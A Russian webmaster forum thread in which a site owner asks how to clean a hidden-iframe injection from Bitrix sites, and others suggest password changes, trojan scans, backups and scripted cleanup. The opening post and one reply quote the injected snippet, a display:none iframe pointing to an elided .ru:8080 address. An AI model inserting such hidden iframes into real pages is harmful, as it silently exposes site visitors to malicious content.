На сайте зараза (как избавится от вируса?)

12
Umbert0
На сайте с 22.01.2009
Offline
81
2953

Здравствуйте, на двух сайтах на одном хостинге обнаружился неприятный сюрприз!

Почти во все станицы index.php на сайтах был встроен код вида:

<div style="display:none"><iframe src="http://........ru:8080/index.php"
width=438 height=383 ></iframe></div>

Сайты под управлением битрикса, подскажите может кто сталкивался с такой бедой, как решить.

Может кто знает сервисы проверки на вирусы

T
На сайте с 16.09.2009
Offline
12
#1

Скорее всего у Вас украли пароли от фтп. У меня такое было как то раз, подцепил трояна.

Замените пароли, и не сохраняйте в вашем фтп клиенте. Если проблема повторится - пишите хостеру.

Yii PHP Framework: Best for Web 2.0 Development Любые работы по Wordpress
dayw
На сайте с 25.01.2006
Offline
116
#2

Идите в поиск, там есть все, что требуется делать и как не допустить такое, а если лень(что уже видно), то идите сразу в раздел "работа для вебмастеров" и закажите услугу по избавлению от вирусов!!!

Вчера поправили (пароли специально не меняли) сегодня опять эта ерунда, пароль сменили.

Я вообще не понимаю вашего сообщения, для чего это специальное бездействие было?

Самое банальное действие:

http://yandex.ru/yandsearch?text=%D0%B2%D0%B8%D1%80%D1%83%D1%81+%D0%BD%D0%B0+%D1%81%D0%B0%D0%B9%D1%82%D0%B5&stpar2=%2Fh0%2Ftm2%2Fs1&stpar4=%2Fs1

Интернет-магазин игровых приставок в Москве (https://savelagame.ru)
Umbert0
На сайте с 22.01.2009
Offline
81
#3

Это было сделано чтобы понять откуда растут ноги, можно долго ругаться что как вы могли допустить и все такое

Однако изменение страниц произошло в 3 часа ночи, и за это время никто не заходил, значит зараза работает изнутри! (И видимо всит гдето в задачах)

И ненадо рассказывать про яндекс и учить пользоваться поиском. Не сижу же я и жду когда все само решиться, понятное дело ищу решение проблемы самостоятельно

Я спросил есть ли у когото опыт работы с подобной проблемой

R
На сайте с 24.01.2008
Offline
180
#4

Стучите помогу разобраться дам рекомендации.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
dayw
На сайте с 25.01.2006
Offline
116
#5
Я спросил есть ли у когото опыт работы с подобной проблемой

все божья роса...

Я еще раз говорю. ВЫ поиске по форуму можно найти не один десяток тем с такой же проблемой и там же рекомендации и как все работает!!!

Это было сделано чтобы понять откуда растут ноги, можно долго ругаться что как вы могли допустить и все такое

Если бы Вы поичитали предыдущие темы с такими проблемами, то сразу же бы поменяли пароли, вылечили компы и т.д.....

А ругаться по данной теме я смысла совсем не вижу, это ваше дело. Вам советуют, а вы сразу в штыки!!!

[Удален]
#6

У нас итальянские партнеры с <iframe src="http://........ru:8080/index.php"> вторую неделю воюют - поминая всех русских тихим итальянским словом.. :)

-Leshiy-
На сайте с 22.01.2007
Offline
165
#7
Umbert0:
Здравствуйте, на двух сайтах на одном хостинге обнаружился неприятный сюрприз!

Почти во все станицы index.php на сайтах был встроен код вида:



Сайты под управлением битрикса, подскажите может кто сталкивался с такой бедой, как решить.
Может кто знает сервисы проверки на вирусы

Полгода назад была подобная беда. Заказали у хостера бекап всей площадки (на всякий случай) и за несколько часов вернули всё на место.

Заодно пролечили все компы на предмет троянов (в поддержке сказали, что могли пароли перехватить в аське).

Ща пашем под ССХ, пароли на фтп никому не даём и лечим паранойю 😂

Maxouni
На сайте с 18.11.2008
Offline
119
#8

Только недавно решил такую же проблему, могу посоветовать следующее:

1) поддерживаю -Leshiy-, тоже заказал бэк до первой активности вируса, но он тоже оказался не чистым.

2)Выкачайте сайт и проверте его антивирусом, у меня nod4 убил насколько яваскриптов

3)Ну естественно вручную почистите глобальные шаблоны, и если он есть и на статьях, каким нибудь скриптом тоже убрать и оттуда.

Да и не забудьте поменять ftp доступ на более надежный

Если не поможет стучите помогу разабораться))

Создание, продвижение, поддержка сайтов и приложений.
-Leshiy-
На сайте с 22.01.2007
Offline
165
#9
Maxouni:
Только недавно решил такую же проблему, могу посоветовать следующее:
1) поддерживаю -Leshiy-, тоже заказал бэк до первой активности вируса, но он тоже оказался не чистым.

На самом деле мне дико повезло, за пару дней до этого меня забанил Яндекс, правда не за вирусы, а за то что у меня украли контент и мой сайт посчитали дублем 😂. Если бы не вору укравшие контент и не бан Яка, я бы так быстро не узнал что у меня площадка заражена и тоже получил бы заражённый архив. Месяц переписки и мой сайт снова оказлся в индексе.

2)Выкачайте сайт и проверте его антивирусом, у меня nod4 убил насколько яваскриптов

Гы-гы. В Джумле, в каждой папке лежит индекс.хтмл - во все файлы бяку прописали, при попытке зайти на свой сайт, браузер начинал лезть в китайщину и тут начинала материться система. ИЧСХ, каждый браузер вёл себя оригинально - при работе с одним, Нод32 ругался, при работе с другим - никак не реагировал, зато третий оказался самым бздительным, как совковый номенклатурщик - дабы ничего не случилось, он падла отправлял комп в перезагруз. 😂

3)Ну естественно вручную почистите глобальные шаблоны, и если он есть и на статьях, каким нибудь скриптом тоже убрать и оттуда.
Да и не забудьте поменять ftp доступ на более надежный

В подавляющем большинстве виноват человеческий фактор.

antoca
На сайте с 14.10.2008
Offline
137
#10

Достаточно написать простую программу на пхп, которая все папки сайта прочекает, и удалит точно такой код где найдет.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий